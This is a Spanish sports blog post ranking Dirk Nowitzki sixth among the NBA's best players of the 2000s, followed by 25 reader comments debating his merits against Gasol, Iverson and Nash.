Los 10 mejores de la década: Nº06

27 de September de 2010 por Viva_Dirk
Artículo 5 de 10 de la serie Los mejores de la década

6.- DIRK NOWITZKI

Si tuviera que hablaros de este hombre desde mi prisma más personal lo haría sobre el mayor ídolo que se puede tener, de amor a primera vista y de un jugador maltratado por la suerte. Así que, para no aburriros con mis alabanzas casi infinitas hacia él, trataré de enfocarlo con la mayor objetividad posible.

En estos 10 años los Dallas Mavericks han cosechado un 68% de victorias en la regular season, siempre con 50 victorias como mínimo en su marcador, 10 presencias en play-offs, una final de la NBA y 4 finales de conferencia. Se trata sin duda de la mejor época que ha vivido esta franquicia en su historia y lo ha hecho gracias a un Nowitzki que ha estado presente en 791 partidos de los 820 posibles. Es el jugador con más minutos disputados en estos 10 años, segundo máximo anotador y quinto reboteador. En su figura han nacido y han muerto los Dallas Mavericks.

Habría que diferenciar en primer lugar la etapa Don Nelson durante los 4 primeros años del siglo. Con ese clásico de los banquillos, tuvieron muy buenos resultados en la RS y derrotas claras en play-offs. El sistema de Nelson no tenía miramiento alguno con la defensa y, aunque el equipo gozaba de un buen caudal ofensivo con Nowitzki, Finley y Nash, las incorporaciones de los diferentes años como Van Exel, Jamison o Walker no aportaban lo que el equipo demandaba: defensa, defensa y defensa. La ausencia de un center de garantías hacía imposible que Dallas superase a equipos como San Antonio o Sacramento, con juegos interiores demoledores. El rendimiento de Dirk en estos años fue, como siempre, el de una superestrella.

Tras estos años llegó la gran oportunidad de Nowitzki de hacerse con un anillo: en la temporada 05-06 alcanzaba por primera y, hasta la fecha, única ocasión la final de la NBA. Después de un séptimo partido sobrehumano de Nowitzki en el Alamo frente a los Spurs y de una eliminatoria frenética ante los Suns, los Heat parecían una presa menos dura de roer que las anteriores. Más aún cuando con 2-0 en la serie y 15 arriba en el tercer encuentro, la final parecía vista para sentencia. Después de esto, como ya sabemos, Wade se desató con el pleno consentimiento de Riley y Nowitzki se vio minado por una gran defensa de Haslem, a la vez que veía inexplicablemente reducido su protagonismo por parte de Avery Johnson.

Tan tremendo revés dejo paso a la mejor temporada de los Mavericks en su historia, con 67 victorias, y al MVP de Nowitzki, que se convertía en el primer europeo en alzarse con tal galardón. Pero, ironías del destino, fue Don Nelson el que propinó a Dallas la estocada mortal con sus Warriors. Los mejores Mavs de la historia caían en primera ronda frente a Golden State, y Nelson, esta vez sí, diseñó una gran defensa sobre un Nowitzki que vio reducidos sus tiros a 15 por partido con pésimos porcentajes. Una vez más, se demostraba que si él no estaba al máximo, Dallas no era casi nada.

Estos 3 últimos años han sido brillantes para Nowitzki en lo personal, y predecibles en lo colectivo, ya que aunque Cuban no ha dejado de invertir mucho dinero en la franquicia, los fichajes de Kidd o Butler han estado siempre a remolque de los movimientos del resto de franquicias punteras, y en su debe queda no haber encontrado un hombre para el banquillo acorde con lo que tenía en la cancha. Mientras Kobe, Duncan y Wade han estado dirigidos por Jackson, Popovich o Riley, Nowitzki ha visto pasar por su lado al inexperto Johnson, el acartonado Carlisle y al eterno perdedor Nelson.

Su paso por la liga, acabe con o sin anillo, será recordado por tratarse de un jugador único: un 2.13 capaz de cerrar el rebote ante el mejor de los centers y sembrar el terror desde la línea de 3, el único jugador de la historia en meter 100 triples a la vez que promediaba 2 tapones por noche, el primer MVP europeo, 4 veces en el mejor quinteto a pesar de coincidir en el tiempo con Duncan y Garnett, y siempre durante estos 10 años en uno de los 3 mejores quintetos. El mejor jugador no estadounidense de todos los tiempos.

Comenta

25 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Vaya por delante que Nowitzki es, indiscutiblemente, de lo mejor que he llegado a ver. Un grande, sin ninguna duda. Una auténtica pasada.
    A partir de aquí me siento muy en desacuerdo con la gran parte del contenido del artículo:
    – Para empezar tengo muchas dudas de que sea el mejor jugador no estadounidense de todos los tiempos… es más, creo firmemente que esto no es así (Olajuwon) Como mucho podría admitir a duras penas que el aspecto meramente individual podría ser el mejor europeo-NBA.
    – Me niego a considerarle como “un jugador maltratado por la suerte”. Ha sido un jugador con excelentes entrenadores, con extraordinarias plantillas y jugadores a su alrededor candidatos al título toda su carrera, siempre mimado por Kuban casi desde que empezó (que no es lo mismo que puede decir gente como Kobe, por ejemplo) y ha estado libre de lesiones.
    El colmo me parece lo de acusar a Avery Johnson de perder aquella final por reducirle protagonismo a Nowitzki… cuando llegó un punto que era él quien no podía ni con su alma y que un jugador de corte menor como Haslem (¿era rookie entonces?) se lo comía vivo defensivamente. Es que no me imagino a nadie tan cenutrio como para “reducirle protagonismo” por capricho, hombre!!! qué locura (ojo… que yo no digo que Avery no tuviera inmensa parte de culpa, pero no precisamente por ese motivo)
    Y no lo has dicho… pero estoy seguro que en el fracaso de los Warriors tampoco tuvo nada que ver el alemán.

    Por mi parte, lo que le reprocho es que su juego es él y nada más que él. Casi todo lo que representa se puede leer en sus tablas estadísticas y no aporta mucho en otros términos más oscuros y colectivos. No creo que haya sido un gran defensor…quiero decir comparandolo con los que se le debe comparar, los que le acompañan en la lista (quitando Nash, posiblemente) o incluso varios que se quedan fuera. Creo que por ahí viene el origen de no haber logrado alcanzar el anillo.
    Eso sí, nadie niega que es uno de los más grandes ejecutores de todos los tiempos y uno de los más difíciles de parar.

      Citar

  2. Txusma dice:
    #2

    Olajuwon acabó jugando un Mundial con la selección americana, así que supongo que se le considera americano a todos los efectos.
    Si me pongo a repasar los grandes nombres de la década sin anillo (Nash, Iverson, Kidd, Nowitzki, Lebron, me dejo alguno?) me doy cuenta de que dos de estos se van a quedar fuera de la lista y habría que analizar muy fríamente que 2 se quedan fuera y porqué. Seguro que podríamos discutir durante horas.

      Citar

  3. portu dice:
    #3

    Suscribo lo q comenta Deer, a nivel individual ha sido un monstruo pero nunca ha hecho mejores a sus compañeros, en defensa tb ha bajado mucho su producción y sus logros individuales y colectivos no llegan para colocarlo en esta posición y quitar de en medio a Iverson, por ejemplo… incluso si lo q cuenta es el tema colectivo Pau es mejor jugador q Nowitzki, lo lleva siendo estas 2 o 3 últimas temporadas y lo seguirá siendo con toda probabilidad las 2 o 3 próximas… cuando comparemos sus carreras dentro de 5 o 6 años creo q Pau habrá sido mejor jugador q Dirk “a la europea” y quizás por el esquema NBA de endiosar las estadísticas individuales pueda aparecer por encima Nowitzki, pero yo sigo creyendo q Pau podría haber elegido ser un Nowitzki y ha elegido ser un ganador.

      Citar

  4. Viva_Dirk dice:
    #4

    Deer, en la eliminación frente a los Warriors cito ‘y Nelson, esta vez sí, diseñó una gran defensa sobre un Nowitzki que vio reducidos sus tiros a 15 por partido con pésimos porcentajes’. Nowitzki estuvo mal, pero me gustaría saber que ‘gran plantilla’ cae ante esos Warriors haciendo su lider 19-12, aunque sea con un 38% en tiros.

    Lo de Avery Johnson no lo digo yo, lo dijo el mismo tras el 2º partido, que no le gustaba la forma en la que se habian ganado los 2 primeros partidos, que queria un baloncesto mas colectivo y una mejor defensa. No creo ni por asomo que su juego halla sido únicamente para el, es verdad que nunca tuvo grandes fundamentos defensivos pero siempre ha sido de los que ha puesto la máxima intensidad en ambos lados de la pista, y el liderazgo(aunque no te conduzca a un anillo), tampoco sale en las hojas.

    Txus, puedes analizar lo que quieras y en casi todos los los aspectos ganan los 2 que han entrado a los 2 que se han quedado fuera, Kidd concretamente es el Nº11 sin duda alguna, pero Iverson, mas allá de la opinión que yo tenga sobre ha sido un lastre para Detroit y Grizzlies sus 2 últimos años sin saber asumir un rol que si han ejecutado otros a la perfección.

    Sobre el último comentario de Portu, Nowitzki no ha podido elegir ‘ser un Gasol’, ningun equipo con Kobe Bryant, Shaq o Pierce lo ha reclutado a cambio de nada. Se habla de que ha tenido grandes plantillas, no lo niego, pero las mejores las tuvo con Don Nelson y con Bradley de center titular(risas de fondo), jamás ha tenido compañeros. Como jugador franquicia ha sido incomparable con Pau.

    Y en lo que menos deacuerdo estoy es en que halla tenido grandes entrenadores, ninguno ha estado a la altura de los nombres que he dicho en el artículo.

      Citar

  5. TheDeerHunter dice:
    #5

    Pues fíjate que entras en una contradicción clara cuando hablas de lo que ha tenido Gasol y ha tenido Nowitzki… y lo que han tenido Phil Jackson, Popovic y Riley frente a Avery Johnson, Nelson y Carlisle… y sólo en dos párrafos consecutivos. Trucos de maestro, Viva… XD

    La plantilla que tenía contra los Warriors era: Devin Harris, Jason Terry, Josh Howard, Nowitzki y Dampier más Stackhouse (me parece que fue mejor 6º hombre ese año, hablo de memoria), Anthony Johnson, Devean George, Crosshere, Barea, Diop, Buckner… entre otros.

    Nowitzki fue MVP merecido… pero detrás tenía 4 tíos por encima o muy por encima de los dobles dígitos, y a varios jugadores que se les fichó por mucha pasta (Dampier, George o Crosshere) pensando que podían ser buenos. Vamos que si te quejas de aquella plantilla es por puro vicio y con ella pasaron por encima de todo cristo en la regular, vamos…

    Ah, y con Don Nelson llegaron a defender bastante mejor que cuando llegaron a las finales. Que últimamente lo de meterse con el viejo técnico se ha convertido en una fea costumbre. Dallas jugó en aquella época mejor que nunca… con Nash de base y tú quejándote del nivel de los compañeros de Nowitzki.

      Citar

  6. sergio dice:
    #6

    Cuando se dice que ha sido un jugador con mala suerte, supongo que ha sido por incompetencia de entrenadores en enfrentamientos directos, por fichar a jugadores para contrarrestar otros grandes fichajes, por la incapacidad de adaptacion de muchos de ellos,… No creo que Nowitzki tenga la mas minima culpa de ello.

    Los dos fracasos ante Warriors (mas) y Heats (menos) estan ahi y tampoco hay que buscar grandes excusas. Por cierto, alguien sabe si Nowitzki ha contado alguna vez en e quinteto titular con alguien que sepa lo que es ganar un anillo?

    En cuanto a los roles y calidad comparandolo con Gasol pues no se…, supongo que uno es un jugador franquicia que ha absorbido mas presión pero no ha ganado nada y otro ha sido en los ultimos años escudero del mejor jugador exterior de los ultimos 10 años y se ha convertido en ganador. Nowitzki tambien hubiese sido escudero de Bryant en LA… y creo q el cambiaría muchos reconocimientos individuales por tener 2 anillos. Eso si, si hacemos una lista de los 10 mejores jugadores de la década, Dirk debe estar y Gasol no…

      Citar

  7. portu dice:
    #7

    No quiero dejar de matizar q Nowitzki me parece un auténtico crack… sólo lo digo para q no se me malinterprete cualquier comentario posterior o cualquier matiz q haga en su juego…
    Nowitzki no ha podido elegir ser Pau Gasol, no tiene las suficientes condiciones para ello… defensivamente nunca ha dado el paso adelante que sí ha dado Pau, en intimidación en dureza en el 1×1, su velocidad en desplazamientos laterales siempre ha sido insuficiente y su mejor arma defensiva ha sido muchas veces el hachazo sin miramientos q tanto perdonan en la NBA a las estrellas. En ataque Pau y Dirk son la noche y el día, es como comparar a un alero y a un center, uno con un tiro excelso y otro con un juego cerca del aro sólo superado por leyendas como Hakeem, Jabbar,… o bestias como Shaq o Chamberlain, si diésemos ahí un empate técnico, en mi opinión la cosa cae del lado de Pau cuando metemos en la ecuación la visión de juego, la capacidad de pase… está claro q uno ha adoptado siempre el rol de jugador franquicia, pero Pau pudo hacer eso y lo hizo en Memphis y se cansó de ello pq su gran deseo era ganar campeonatos. Dirk quizás no pudo decidir o quizás pensó q era más decisivo de lo q realmente era, en cualquier caso yo no le he visto nunca hacer mejores a sus compañeros, y puede q en muchos momentos haya tenido plantillas descompensadas o fichajes desacertados o entrenadores inválidos o rivales demasiado fuertes, veo demasiadas excusas.
    A nivel personal no me gusta Iverson, muchos lo sabeis, pero dentro de este contexto, dentro de esta lista histórica q valora premios colectivos, Iverson está exactamente al mismo nivel o incluso algo por encima de Dirk, no creo q la objetividad permita q uno sea el 6 y otro el 12.

      Citar

  8. portu dice:
    #8

    Quería comentar una interesante frase de Sergio de su último párrafo: “Nowitzki tb hubiese sido escudero de Bryant en LA”. Pues yo tengo mis dudas… entramos en el terreno NBA-ciencia ficción, todo es opinión y especulación, pero fíjate q yo no veo a Nowitzki rindiendo al nivel de Pau cuando le tocase tirar 10 veces en un partido o cuando su misión fuese pegarse en la zona y distribuir el balón en ataue… y ya ni te cuento con el rol de Pau cuando Bynum ha estado lesionado… sus minutadas de center parando incluso a bestias pardas como Howard me da q no le hubiesen encajado al perfil de Nowitzki, curiosamente un tío de 2,13 al q siempre q le han buscado un compañero en el juego interior siempre han optado por el center leñero antes q por el 4 q tuviese aptitudes en ataque… y él no podía fajarse en defensa contra un center? sinceramente, prefiero jugar con Marion-Nowitzki antes q con Marion-Dampier por no mirar muy atrás, pero Dallas siempre ha apostado por lo q dejaba a Nowitzki en su intocable puesto de 4, de amenaza principal en atque… realmente hubiese encajado ese perfil con Kobe)?
    Por otro lado, este año acabó contrato, había innumerables equipos esperando sumar estrellas, a poco q hubiese bajado su caché podría haberse juntado a algún otro jugador de 1er nivel… Chicago, NY,… pero claro 80 kilos más en 4 años con 32 tacos…. es muy fácil decir q no le importaría ser escudero pero este año ha tenido alguna oportunidad parecida y ha preferido la pasta.

      Citar

  9. Viva_Dirk dice:
    #9

    Iverson no esta al mismo nivel de Nowitzki en esta lista únicamente por sus 2 últimas campañas en las que ha cedido el título de máximo anotador y sobre todo ha demostrado que le importaba mucho mas su ombligo que cualquier franquicia. Ah! y no me habria importado ver a Nowitzki con Billups y Carmelo de socios y George Karl en la banda, amos no me jodas….

    En cuanto a la defensa no he negado que el desplazamiento de Nowitzki fuese insuficiente e incluso su posicionamiento en defensa no sea adecuado, pero si defiendo que se ha dejado siempre la piel haciendolo lo mejor posible, de ahí sus cifras taponadoras sin tener unas grandes cualidades para ello.

    Si Deer, tuvo a Nash de base y Finley de escolta, a mi me encantaba aquel Finley y Nash aunque no era el de ahora era un gran base, pero si esperabas que ese equipo ganase a Spurs, Kings o Lakers es que no recuerdas sus plantillas. Y hablando de la plantilla de las 67 victorias, Howard y Terry si estaban a la altura de las exigencias del equipo, ahora bien, Harris no era nadie en su tercer año en la liga y estaba en 10 puntos en 25 minutos de juego, Stackhouse era un suplente válido que no fue 6º hombre, y el resto eran la morralla que tu mismo has descrito empezando por Dampier que no hizo nada digno en todos los años que estuvo en los Mavs.

    Como he dicho en el artículo, nadie niega que halla tenido buenas plantillas, pero me gustaría oir una actuación en concreto de un compañero suyo ganando una serie de play-offs, tirando del equipo cuando el no tuvo su noche. Puedo recordar a la primera la reciente actuación de Artest cuando Kobe estaba jugando de pena, los triples de Ray Allen antes de que Pierce montara su numerito en las finales, a Horry liandola con los Lakers y con los Spurs, a Posey implacable desde la linea de 3, la defensa de Prince sobre Kobe o los 27 rebotes de Mutombo el dia que Iverson hizo un 5 de 27; incluso en equipo menos exitosos encontramos casos como el de Turkoglu resolviendole los partidos a Howard o Jerome James(juas) saliendose para ganar una primera ronda de play-offs. Cuando Nowitzki ha estado mal, porque es humano, en los Mavs no ha dado un paso al frente nadie, y ahí es cuando se ganan o se pierden las eliminatorias, ejemplos a lo largo de la historia hay los que querais.

      Citar

  10. portu dice:
    #10

    Iverson jugó con Billups y Carmelo?

      Citar

  11. MagicJohnson32 dice:
    #11

    Los bases titulares en los Nuggets de Iverson y Melo fueron Steve Blake y Anthony Carter.

      Citar

  12. portu dice:
    #12

    Al último párrafo… Terry ha hecho auténticos partidazos, algunos de ellos en playoffs. Dampier ha decepcionado si esperabas a Shaquille O´Neal, pero si lo comparas con K. Perkins tampoco creo q debas quejarte tanto de él. Lo de Nash sí q es como comentas, no estaba al nivel q luego llegó a dar… otros grandes jugadores han visto caer su rendimiento llamativamente al lado de Dirk, sin ir más lejos C. Butler y Marion…
    Acepto lo de los dos últimos años de AI, está claro q hablan de la tremenda mentalidad egocéntrica de Iverso, algo q lo diferencia de Dirk, pero analizando la década en cuanto a resultados individuales y colectivos esa diferencia entre ambos no existe.

      Citar

  13. Viva_Dirk dice:
    #13

    No, he dicho actuaciones concretas, la canasta del partido número nosecual contra nosequien, yo te los he dado de otros. De verdad me dices que si Duncan hace 19-12 con un 38% en tiros los Spurs pierden contra GSW??. Lo de Marion y Butler no me lo cuentes, Nowitzki jamás ha sido un impedimento para que otros jugadores de su equipo tuviesen mucho protagonismo ofensivo(Finley, Nash, Howard, Terry), eso si, si juegas en un equipo dirigido por Carlisle no esperes mucha riqueza ofensiva.

    Asi que no existe diferencia, pues veamos: Dirk 10 play-offs, Iverson 5, Nowitzki 791 partidos(96%), Iverson 640(78%), Nowitzki un 68% de victorias, Iverson un 53%, Nowitzki 106 partidos de play-offs y Iverson 49. Mas eliminatorias ganadas, mas partidos ganados, mayor profesionalidad y mucho mejor compañero, si quieres reducirlo todo a anillos y MVPs puede hacerlo.

    Admito el lapsus con Billups-Carmelo, pero me vale Carmelo-Nene, Nowitzki habria vendido su alma por un center como Nene. Perkins es mucho mejor que Dampier en compromiso y trabajo, de hecho es uno de los mejores defensores al poste bajo de la liga, y aunque admitiese igualdad, creo que Terry y Howard no son comparables con Allen y Pierce.

      Citar

  14. portu dice:
    #14

    Creo q el tema Iverson todavía es discutible, das valor a unos determinados puntos y se los quitas a otros… pero vamos, q mi opinión sobre Iverson hace q no me aptezca seguir encumbrando sus logros individuales y colectivos… sigo sin ver tanta diferencia entre ambas carreras…
    Lo de Nene sí q ya es la leche, je,je, un tío con 2 temporadas enteras perdidas por lesión y cáncer de testículo, otras tantas temporadas iniciales de su carrera absolutamente intrascendentes y resulta q ahora es mejor q Dampier y cualquier otro compañero de Dirk… vamos, hombre, si fuese así lo habrían fichado hace unos años, q era bien baratito…. Lo de Allen y Pierce supongo q va por Garnett, pero vamos, si ahora resulta q Allen con 33 tacos y Pierce son las megaestrellas mundiales… ese equipo de los celtics es el ejemplo perfecto de lo q nunca podrá integrar Nowitzki: un equipo rocoso en densa, casi inexpugnable, con bastante altruismo en ataque y los egos individuales muy bien controlados, todo lo contrario de Dallas: una superestrella preponderante pese a sus limitaciones (sobretodo defensivas), todo un juego y una química de equipo oscilando durante 10 años entorno a la misma figura, muchas veces en detrimento de otras piezas q podrían haber sido más importantes y no se sabe porqué nunca llegan a serlo… todo eso llega para lo q llega, ojo q no es poco, una regular season arrasando, unas Finales,… pero siempre falta algo, y en eso q falta yo pongo un % de culpabilidad a Nowitzki…

      Citar

  15. Viva_Dirk dice:
    #15

    Desde luego yo también le pongo un % de culpa a el, pero en ningun caso ha sido el gran culpable de los fracasos que han tenido, su rendimiento ha sido siempre altísimo. Y estoy seguro de que habria encajado en un equipo como los Celtics a la perfección, aunque no tenga las cualidades defensivas de Garnett habría aportado mucho.

    En cuanto a Nene, es mejor que Dampier 1000000000 de veces, y mejor que cualquier center que halla tenido Nowitzki a su lado.

      Citar

  16. portu dice:
    #16

    Hombre claro, tú hablas del Nene sano, de ese q cuando lleva 20 partidos sin lesionarse te hace 20 ptos y 12 rebotes con la gorra, a mi tb me encanta ese Nene… pero claro, eso es ciencia ficción, si lo hubesen fichado los Mavs probablemente hablaríamos de Nowitzki acompañado por cualquier pakete pq Nene, el titular, se pasó la temporada lesionado… además, ya hemos visto sus brillantes actuaciones en playoffs estos años con los Nuggets… y ojo, q es muy bueno, pero sobretodo en ataque, en defensa le gusta ir al tapón pero eso del 1×1 no lo veo como tú dices, a él le gusta brillar en ataque y no es de los q se gasta en defensa.

      Citar

  17. TheDeerHunter dice:
    #17

    Lo de que nadie dió un paso adelante en los malos momentos de Nowitzki no es verdad. Revisa por favor la final contra Miami y lo de los Warriors y después me cuentas. Podríamos revisar otros fracasos… y ojo, que yo no le acuso de que la culpa sea suya. Pero si es un dato para valorar su grandeza por ahí patina, y remito a mis argumentos iniciales. Esos son sus defectos.
    Lo que dijo Avery Johnson en aquella final también son palabras… no hechos. Nowitzki estaba fundido y supongo que de ahí vienen sus declaraciones… pero en absoluto tuvo menos protagonismo en los partidos siguientes. Me parece que Phil Jackson hizo alguna declaración similar sobre Kobe este mismo año… y vaya, que los hechos son otros empezando por los suyos.

    Nené no es 10000000000000 o lo que quieras mejor que Dampier, pero lo es todavía mucho menos menguado como lo hizo en la etapa Iverson.

    Y una última cosa de lo que se ha dicho. Estoy harto de oir que Gasol es escudero de Kobe. Esto es llevar la palabra “escudero” a una generalización y a un simplismo máximo. Me parece tanto como decir que Russell era escudero de Havlicek, que Kareem-Abdul-Jabbar fue escudero de Magic (o al revés) o que el mismísimo Chamberlain fue escudero de West. Todo falsedades como pianos. Es una absurda moda centrar todo en una única figura porque las cosas no son siempre iguales en todos los equipos ni en todos los modelos.
    Por ahí ya he dicho en otras ocasiones que no creo en absoluto que Nowitzki hubiera dado a LA lo que les ha dado Pau. Siendo tan primera espada o casi como Kobe (y se ha visto este mismo año)

      Citar

  18. Viva_Dirk dice:
    #18

    Donde he dicho yo algo sobre Gasol? No he dicho nada de eso, lo crea o no. He dicho que Nowitzki habria encajado bien en un equipo como los Celtics o los Lakers, en ningun momento lo he comparado con Gasol. Aunque tus comparaciones no las entiendos, los MVPs(en plural) iban para Russell y Chamberlain, no podian ser escuderos de nadie, Jabbar también fue MVP con Magic en el equipo, pero evidentemente después paso a ser uno de los ‘secuaces’ de Magic. No se, que Kobe sea el lider de los Lakers no resta mérito a lo que hace Pau.

    No son palabras, Nowitzki lanzó 55 tiros en esos 3 últimos partidos, menos que en la regular season y que en los 3 primeros partidos, mientras Wade recibia carta blanca como es normal en una final donde no hay nada que dosificar, no creo que el físico de Nowitzki fuese el motivo de aquello.

    Y en lo de dar la cara, he preguntado por una acción concreta, una canasta para ganar el partido, para mandar el partido a la prórroga, un tapón o un robo. Ya se que Howard jugó bien frente a los Warriors, pero si el equipo Nº1 en victorias de la liga no gana a esos Warriors no es porque su estrella haga 19-12 con un 38% en tiros, ese no puede ser el motivo.

      Citar

  19. Gallis dice:
    #19

    Nowitzki por delante de Nash???

      Citar

  20. TheDeerHunter dice:
    #20

    Lo de Gasol no iba por ti en este caso, Viva… y admito que las comparaciones eran algo exageradas… pero en esencia sí indican lo que quería decir. Me parece grosero calificar a Gasol como escudero de nadie y no se ajusta a la realidad de las cosas. Más bien las deforma.
    Y en cuanto a lo de MVP… también podríamos discutir ese concepto, qué representaba y representa ahora y alguna decisión en la que podría haber estado involucrado Gasol como “escudero” de otro.

    De los tiros que comentas… no tengo ni idea a qué te refieres. Su media de lanzamientos era de 19 esa temporada. De los tres últimos en uno lanzó 14, el otro 20 y en el último 22. Si te parecen pocos… pues sí, sería por eso que perdió la final. Debería haber lanzado 35 por partido…

    Y lo de las acciones concretas… por definición son anecdóticas. No puedes calificar a nadie de “maltratado por la suerte” porque hayan o no tenido lugar. Me parece que Nowitzki no ha sufrido mala desde ningún punto de vista. Más bien al contrario.

      Citar

  21. sergio dice:
    #21

    Supongo que cuando dices escudero lo dices por mi Deer.

    Cuando digo eso, me refiero al nivel de presión y responsabilidad de Pau. A mi forma de ver, se le exige menos que a Bryant por motivos de calidad, años en la franquicia,… Cuando digo escudero no me refiero a un Sancho Panza del basket ni a un jugador que no pertenezca a la elite de la NBA o no pueda decidir partidos por si solo. Ahora, con lo demostrado estos dos ultimos años, con un nivel de determinación y caracter ganador al menos similar al 24 amarillo, los aficionados esperan respuestas por parte del de Sant Boi casi a la par de su compañero. No entiendo que puedas pensar que se desvirtua a Gasol diciendo “escudero”. Que otros se lleven los flashes y se les de la pelota en los momentos mas calientes no significa calidad añadida… solo respuesta a la presión.

    Hablando un poco de esa “mala suerte” de Dirk estos años, tampoco creo que sea ese tipo de suerte que se tiene al lanzar los dados o jugar a la loteria. Se trata de motivaciones, falta de respuesta de los entrenadores, canastas decisivas, lesiones,… creo que muchas veces los Dallas han ido a remolque. Dando respuesta a los movimientos y fijandose mas en intentar igualar los nombres de la plantilla y el staff de otras franquicias antes de potenciar la concentración, el espíritu ganador y confeccionar un plantel acostumbrado a ganar. Cuban habrá puesto dinero pero no ha sabido compensar una plantilla más haya de los nombres. Me suena a cierto presidente futbolístico del que no quiero dar nombres…. 😉

      Citar

  22. sergio dice:
    #22

    vaya… e puesto “haya” en lugar de “allá”…. y ayer criticando por ahi…. xD

      Citar

  23. Nacho dice:
    #23

    El basket, como cualquier deporte profesional tiene un fin: ganar. En la NBA ese ganar, es ganar el anillo, y quienes llegan a tenrlo son los REALMENTE GRANDES.
    Me explico:
    Hay tres niveles, más o menos, de jugadores que se creen grandes, en el mundo profesional. En la NBA en concreto tendríamos:
    1. los que quieren ser grandes en un equipo mediocre haciendo sus números, queridos en la ciudad, pero sin margen de mejora en lo que a hacer grandes a sus clubs se refiere. Ejemplo, hasta ayer: BOSH.
    2.los que quieren ser grandes en un equipo mediocre… mejorando ellos y a sus compañeros, sin caer en la vanagloria y pujando cada día más. Ejemplo: DURANT.
    3. los que quieren (y casi siempre lo son) serlo y llevan a sus equipos a serlo. Alguanas veces lo consiguen, y otras no. Ejemplo: BRYANT. Si no lo consigues nunca, a lo mejor no eres tan grande. Que es mala suerte, a lo mejor. Pero siempre se ha dicho que la suerte acompaña a los campeones. Y lo siento, si no eres campeón, no eres grande, ni por supuesto de los mejores de la década, de la historia, o lo que sea. Otra cosa es que entre esos grandes gustemos de poner a los que nos hacen felices por su juego, NASH; a los que les reconocemos profesionalidad, DIRK; o a los que siendo muy buenos jugadores les reímos las gracias y aguantamos que sean bocazas, BARKLEY. Recordemos que el ciclista más querido en Francia fue Poulidor, pero el más GRANDE fue Anquetil.

    Y todo este rollo para mi teoría (vale, lo anterior también lo era):
    El grande debe mirar su yo para ser un ganador. YO me lo tiro todo, yo me lo juego todo no suele servirles de nada; LeBRON, KOBE en sus años no, y otros muchos. El paso de tirárselo todo a casi todo los suele convertir en ganadores. Y luego hay jugadores que su YO ganador les dice lo que tienen que hacer para ganar, y a lo mejor es eso que muchos llamarán rol secundario o escudero, pero lo que hacen es demostrar que son grandes porque saben anteponer la victoria de su equipo (no olvidemos que eso es lo más grande para un grande) a sus números. Ejemplo claro Gasol.
    Rápidamente y por no dar la brasa, miremos sus números esta década (vale no todo NBA)
    De niño campeón con el BarÇa (le falta la final four y él lo sabe, vendrá por ella)
    Número ¿3? del draft iendo europeo criado en Europa.
    Jugador franquicia de un equipo (de los peores, sino el peor de la hstoria de la NBA) con veintippocos años.
    Llevar a ese equipo, a los PO. Jugando siempre para el equipo y no para sus números (si los hubiera buscado me río yo de los de BOSH). Y vale, aceptemos (lo dudo) que el último año en Menphis lo hizo.
    Campeón del mundo y MVP del campeonato
    Subcampeón y luego campeón de Europa, MVP incluido.
    Subcampeón Olímpico, con un equipo de europeíllos, contra el segundo mejor equipo de la historia según todos los analistas.
    Subcampeón de la NBA
    Dos anillos consecutivos, con unos números brillantes y los intangibles no estadísticos como sus memorables defensas (sí, defensas) a Howard (el 5 más dominantre…) en el primero de ellos.
    Si después de todo esto, en la décadda pasada, no lo consideramos de los 10 mejores y está por detrás de NO GANADORES, yo no entiendo nada, acaso que por no pecar de chauvinsmo pasemos de él.
    Nada más, y eso no empaña el gran trabajo del blog, y de esta serie en particular.

      Citar

  24. TheDeerHunter dice:
    #24

    @Sergio: No lo decía específicamente por ti. Últimamente creo que ese concepto está demasiado de moda (LeBron) y casi siempre se utiliza en términos peyorativos. Con Gasol siempre ha habido una corriente muy crítica (y otra todo lo contrario) y cuando se han terminado los argumentos en cuanto a sus defectos baloncestísticos se enarbola la bandera del secundario/escudero, cuando en la práctica todos hemos podido ver estos playoffs lo que realmente es (y en las finales anteriores)
    No creo que sea cierto que tiene menos presión que Kobe. La prueba es cómo le trataron por aquellos lares tras la final que se perdió contra Boston. Le dijeron de todo menos bonico y eso que era prácticamente una encerrona para él. Y eso que Kobe tampoco estuvo precisamente estupendo aquella vez.
    Supongo que es innegable que la categoría de ambos no es la misma. Kobe está en condiciones de ingresar en un hipotético top ten histórico a poco que logre unos pocos hitos más. Gasol no puede llegar a esas cotas pero eso no le inhabilita para considerarlo a la altura que le corresponde. Ni más ni menos reconocido entre los mejores de la historia de dos franquicias distintas… una de ellas la franquicia más importante del mundo (con permiso de los verdes)
    @Nacho: De la misma forma el hito del anillo, como la de tantos y tantos títulos de diversa índole es un logro más colectivo que individual. De ahí la dificultad para valorarlo dentro de una clasificación orientada a lo estrictamente individual.
    Los anillos son importantes, por supuesto, para medir la grandeza. No es lo mismo un lanzamiento en la regular que en el último minuto del séptimo partido de la final. En las situaciones más extremas es donde se ve realmente de qué pasta está hecho cada uno (Vujacic rules!!!)
    Pero vamos… de ahí a hablar de No Ganadores cuando nos referimos a un Malone, o un Barkley, o un Baylor o tantos y tantos otros va un trecho muy gordo, porque ellos demostraron con creces durante un tiempo suficiente como para que lo vieramos lo ganadores que eran. Únicamente les faltó que circunstancialmente no hubieran otros en ese momento más poderosos que ellos. Todo es demasiado relativo como para que sea un axioma.
    Para mí, por ejemplo, el tocarle la cara a Jordan de tú a tú como lo hicieron Malone o Barkley tiene más valor que algunos títulos que he visto de otros.
    De todas formas estoy contigo conque si Gasol no entra en la lista es simplemente por una cuestión de criterio… aunque si su nivel durante este tiempo hubiera sido siempre el de estos dos últimos años otro gallo cantaría.

      Citar

  25. Viva_Dirk dice:
    #25

    @Gallis: Si, Nowitzki justo por delante de Nash, su carrera es mucho mas completa, un MVP mas y en todo lo demás por debajo.

    @Nacho: Entonces deberiamos poner a Fisher por delante de Nash? A Ginobili por delante de Lebron? No creo que se pueda hablar solo de ganadores y no ganadores para diferenciar a los mas grandes de los que no lo son.

      Citar

Deja un comentario

